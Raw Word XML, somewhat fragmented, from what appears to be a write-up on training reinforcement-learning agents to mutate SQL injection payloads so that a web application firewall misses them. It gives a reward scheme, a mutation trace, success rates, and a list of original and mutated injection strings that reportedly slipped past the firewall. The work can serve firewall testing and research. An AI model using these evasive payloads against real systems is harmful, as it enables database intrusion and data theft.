              <w:t xml:space="preserve"> SYS_DB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AFAA4C" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>INFORMATION_SCHEMA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> SYS_DB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F24D9C3" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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F3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SYS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> SYS_DB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146B094A" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD3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027FC0" w:rsidRPr="00BB099F" w14:paraId="56DCBE55" w14:textId="77777777" w:rsidTr="0005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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4266ABB1" w14:textId="748D5FA8" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD30E9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>NUMB_TOKENS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A2DDD07" w14:textId="77777777" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00BB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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>DECIMAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C84F996" w14:textId="77552D0D" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00BB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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> INT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D58F06" w14:textId="646A9CAD" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00BB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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>HEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66ABE8AA" w14:textId="4B320F9E" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00DD30E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C2E7F7" w14:textId="019E480D" w:rsidR="004F5E98" w:rsidRPr="004F5E98" w:rsidRDefault="004F5E98" w:rsidP="004F5E98">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F5E98">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5E98">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> of tokenized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="004F5E98">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE5363" w14:textId="4157CDB3" w:rsidR="00AD5987" w:rsidRDefault="000573A2" w:rsidP="00DD30E9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FB31BB6" wp14:editId="1C8587D8">
            <wp:extent cx="5731510" cy="2191385"/>
            <wp:effectExtent l="190500" t="190500" r="193040" b="189865"/>
            <wp:docPr id="3" name="Picture 3" descr="Examples of SQL query tokenization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SQL query tokenization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3F040" w14:textId="2FA0A195" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="00134642">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0027551D">
        <w:t>Reward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40639803" w14:textId="77777777" w:rsidR="00134642" w:rsidRPr="00134642" w:rsidRDefault="00134642" w:rsidP="00134642"/>
    <w:p w14:paraId="374FA5BD" w14:textId="13A90C2C" w:rsidR="00101AAD" w:rsidRPr="00101AAD" w:rsidRDefault="00101AAD" w:rsidP="00C16477">
      <w:r>
        <w:t>R = 10 if the</w:t>
      </w:r>
      <w:r w:rsidR="00B077A6">
        <w:t xml:space="preserve"> malicious payload is not detected, otherwise R = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96756B" w14:textId="4DD8DF52" w:rsidR="0027551D" w:rsidRPr="0027551D" w:rsidRDefault="00101AAD" w:rsidP="00C16477">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00B077A6">
        <w:t>eward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = R </w:t>
      </w:r>
      <w:r w:rsidR="00B077A6">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B077A6">
        <w:t>0.1*step</w:t>
      </w:r>
      <w:r w:rsidR="004F5E98">
        <w:t xml:space="preserve">   # we are </w:t>
      </w:r>
      <w:r w:rsidR="001C5BE5">
        <w:t>adding negative reward with every step to encourage finding the successful mutation in fewer steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA90FA" w14:textId="2B6C02AC" w:rsidR="00A06C9B" w:rsidRDefault="00A06C9B" w:rsidP="00C16477">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22014C1C" w14:textId="77777777" w:rsidR="00A06C9B" w:rsidRDefault="00A06C9B" w:rsidP="00A06C9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mutation steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E15D0" w14:textId="652BCBAB" w:rsidR="00A06C9B" w:rsidRDefault="00A06C9B" w:rsidP="00E954B0"/>
    <w:p w14:paraId="2DB421B4" w14:textId="10270924" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">eset payload: </w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>' select * from users where id = 1.&lt;@. or 1 = 1 -- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DB4E1" w14:textId="591110ED" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: spaces_to_comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91084F" w14:textId="242FFA8C" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select * from users where id = 1.&lt;@. or 1 = 1 -- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8A02E" w14:textId="53559EAB" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: spaces_to_comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25EA9E" w14:textId="36F1D028" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select */**/from users where id = 1.&lt;@. or 1 = 1 -- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA66412" w14:textId="1689E088" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: spaces_to_comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59FAFB" w14:textId="7F2A2CF9" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select */**/from users where id = 1.&lt;@. or 1 = 1/**/-- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE2D00" w14:textId="418710EB" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: spaces_to_comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65112D38" w14:textId="3981F40E" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select */**/from users where id =/**/1.&lt;@. or 1 = 1/**/-- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F009D7A" w14:textId="4AD0DE1D" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: spaces_to_comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A62CE2" w14:textId="15034603" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select */**/from users where id =/**/1.&lt;@. or 1/**/= 1/**/-- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4314B298" w14:textId="06AAD1E7" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00E954B0">
        <w:rPr>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: comment_rewriting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14388E" w14:textId="4A55A800" w:rsidR="00E954B0" w:rsidRDefault="003A3B8E" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0" w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>utated payload</w:t>
      </w:r>
      <w:r w:rsidR="00E954B0">
        <w:t>: '/**/select CdS_;*/**/from users where id =/**/1.&lt;@. or 1/**/= 1/**/-- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A97AB9D" w14:textId="7C2BC349" w:rsidR="00A06C9B" w:rsidRDefault="00E954B0" w:rsidP="00E954B0">
      <w:r w:rsidRPr="00AC6DCD">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>WIN with payload</w:t>
      </w:r>
      <w:r>
        <w:t>: '/**/select CdS_;*/**/from users where id =/**/1.&lt;@. or 1/**/= 1/**/-- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EFB36B" w14:textId="7829125A" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="00E954B0"/>
    <w:p w14:paraId="5AB1F07E" w14:textId="7763FDE4" w:rsidR="00395385" w:rsidRDefault="00395385" w:rsidP="00E954B0"/>
    <w:p w14:paraId="52101827" w14:textId="2FFD06D0" w:rsidR="008748AC" w:rsidRDefault="008748AC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908D9C3" w14:textId="72A63874" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0B5D8" w14:textId="7ADD1B79" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5"/>
    <w:p w14:paraId="0F73E27A" w14:textId="2DDEC2C3" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Random agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E282B6" w14:textId="6DBD7215" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5"/>
    <w:p w14:paraId="17CE7409" w14:textId="5D717550" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5">
      <w:r>
        <w:t>An agent that randomly selects actions and performs mutations on our payload set has a success rate at ~1% (if we run it on 1000 SQL injection payloads, it manages to mutate it so WAF doesn’t identifies it as malicious in 10 cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F349D67" w14:textId="72C2146B" w:rsidR="00395385" w:rsidRDefault="00395385"/>
    <w:p w14:paraId="1A963DA4" w14:textId="10C77E4B" w:rsidR="008748AC" w:rsidRDefault="008748AC"/>
    <w:p w14:paraId="5044C22F" w14:textId="78DA7517" w:rsidR="008748AC" w:rsidRDefault="008748AC"/>
    <w:p w14:paraId="6FCAE266" w14:textId="77777777" w:rsidR="008748AC" w:rsidRDefault="008748AC"/>
    <w:p w14:paraId="77FA5FC7" w14:textId="3F4B657F" w:rsidR="000958A5" w:rsidRDefault="000958A5" w:rsidP="000958A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>PPO agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A818783" w14:textId="66388647" w:rsidR="00395385" w:rsidRDefault="00395385" w:rsidP="00395385"/>
    <w:p w14:paraId="21843BE5" w14:textId="51FF7F5B" w:rsidR="00395385" w:rsidRDefault="00395385" w:rsidP="00395385">
      <w:r>
        <w:t xml:space="preserve">Without the hyperparameter tuning, the PPO agent </w:t>
      </w:r>
      <w:r w:rsidR="000161F1">
        <w:t>has a success rate of around 20%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E9518" w14:textId="5F8AAB3C" w:rsidR="00AD4FAA" w:rsidRDefault="00AD4FAA" w:rsidP="00395385"/>
    <w:p w14:paraId="65D7FDD4" w14:textId="3DF519D9" w:rsidR="00AD4FAA" w:rsidRPr="00AD4FAA" w:rsidRDefault="00AD4FAA" w:rsidP="00395385">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4FAA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Steps per episode: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED5CE4" w14:textId="5FC2112E" w:rsidR="00AD4FAA" w:rsidRPr="00AD4FAA" w:rsidRDefault="00AD4FAA" w:rsidP="00395385">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4FAA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Learning rate: 5e-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A3F3D" w14:textId="4AD90557" w:rsidR="00395385" w:rsidRDefault="00395385" w:rsidP="00395385"/>
    <w:p w14:paraId="02AEAFF4" w14:textId="6C3A5C29" w:rsidR="00395385" w:rsidRPr="00395385" w:rsidRDefault="00395385" w:rsidP="00395385">
      <w:r w:rsidRPr="00395385">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15EE808A" wp14:editId="59DE46B5">
            <wp:extent cx="5731510" cy="2109470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="5" name="Picture 5" descr="Chart, bar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B085" w14:textId="7FB4D779" w:rsidR="003A3B8E" w:rsidRDefault="003A3B8E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56733E" w14:textId="6683A7E7" w:rsidR="004C054F" w:rsidRDefault="004C054F" w:rsidP="004C054F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Examples of successful mutations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CD39D5" w14:textId="53309651" w:rsidR="004C054F" w:rsidRDefault="004C054F" w:rsidP="004C054F"/>
    <w:p w14:paraId="0A037786" w14:textId="2854606D" w:rsidR="004C054F" w:rsidRPr="004C054F" w:rsidRDefault="004C054F" w:rsidP="004C054F">
      <w:r>
        <w:t>Original payload is the SQL injection payload (WAF is recognising it as malicious) and the mutated payload is the malicious payload that WAF didn’t recognise (and block).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26569F" w14:textId="50BC214D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 or ""%1"" or 1 = 1 -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D5F8A4" w14:textId="577E0D9D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 select zz*/*&lt;7&amp;x,*/from users/**/where id =/**/1 or/**/""%1""/**/or/**/1 = 1 -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B06E1D" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7D33C4" w14:textId="11B06298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 &lt;@&amp;@ union select 1,version (  )  -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37BFE5" w14:textId="577C73E4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"/*H    !--`*/select hn*/*o]4 */from/**/users where id/*j*/= 1/**/&lt;@&amp;@ union select 1,version ( /*rr-Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C977ED" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#k*/) /**/-- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AA0BB" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4F368" w14:textId="7875FA5F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a' or 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAD5F2" w14:textId="51C8D51B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a'/*=,:Q*/or/gWHe*/;hAz\2*-Y*/1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE4D74" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADE18E2" w14:textId="31FA81E2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 or \&lt;  = 1 union select 1,@@VERSION -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D635B" w14:textId="00EE89B0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"/**/select mu{*/**/from users/**/where/**/id = 1/*nw*/or \&lt; /*b"zu#S*/= 1/**/union select 1,@@VERSION/*[*/-- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708957F2" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFFE077" w14:textId="56206BAA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 or "" (  ) "" or 1 = 1 -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76531150" w14:textId="1BCED790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 select/**/rE^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCC3354" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>*/*c1r!l_*/from/**/users where id/**/= 1 or "" (  ) ""/**/or 1 = 1 --/**/1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA14BB" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3059FD1C" w14:textId="0D8415DC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'1' &lt;@$_ union select 1,version (  )  -- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FF756" w14:textId="7E33D5B1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 select )*/**/from users where id =/*@~4b6*/'1'/**/&lt;@$_/*SmL$*/union/**/select/**/1,version/*\^W%*/(  ) /*wQ  `YG*/-- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D061C1" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5242F5D7" w14:textId="0C92BF02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 or ""1{"" or 1 = 1 -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE12F1" w14:textId="597EB123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 select vKg^*/**/from users where/**/id/**/= 1 or ""1{""/*G    */or 1 = 1/**/-- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B899F95" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BC1707" w14:textId="133F5C9E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'1' union select \.,@@VERSION -- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC6A24" w14:textId="7C6E88D2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 select PL*/*bXiUq*/from/**/users where id/**/=/**/'1' union/**/select \.,@@VERSION/**/-- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1010D7EC" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7138417D" w14:textId="683BDD6C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' group by userid having 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16354090" w14:textId="7C105E59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' group by/**/userid/\*/Z 5*/having 1 =/*P?*/1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA9A60" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100101FC" w14:textId="77777777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 or @`\` union select 1,version (  )  -- 1"</w:t>
      </w:r>
    </w:p>
